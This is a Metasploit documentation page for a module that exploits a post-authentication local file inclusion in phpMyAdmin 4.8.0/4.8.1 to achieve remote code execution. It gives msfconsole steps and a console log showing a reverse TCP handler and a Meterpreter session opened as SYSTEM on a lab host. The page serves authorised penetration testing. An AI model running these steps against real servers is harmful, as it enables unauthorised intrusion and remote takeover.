metasploit-framework/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md

Description

phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to make the application execute PHP code. The module has been tested with phpMyAdmin v4.8.1.

Vulnerable Application

phpMyAdmin v4.8.1 and v4.8.0

Verification Steps

  1. ./msfconsole -q
  2. use exploit/multi/http/phpmyadmin_lfi_rce
  3. set rhosts <rhost>
  4. run

Scenarios

Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1

msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122
rhosts => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run

[*] Started reverse TCP handler on 172.22.222.190:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Meterpreter session 1 opened (172.22.222.190:4444 -> 172.22.222.122:51999) at 2018-07-05 13:14:39 -0500

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    :
OS          : Windows NT 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >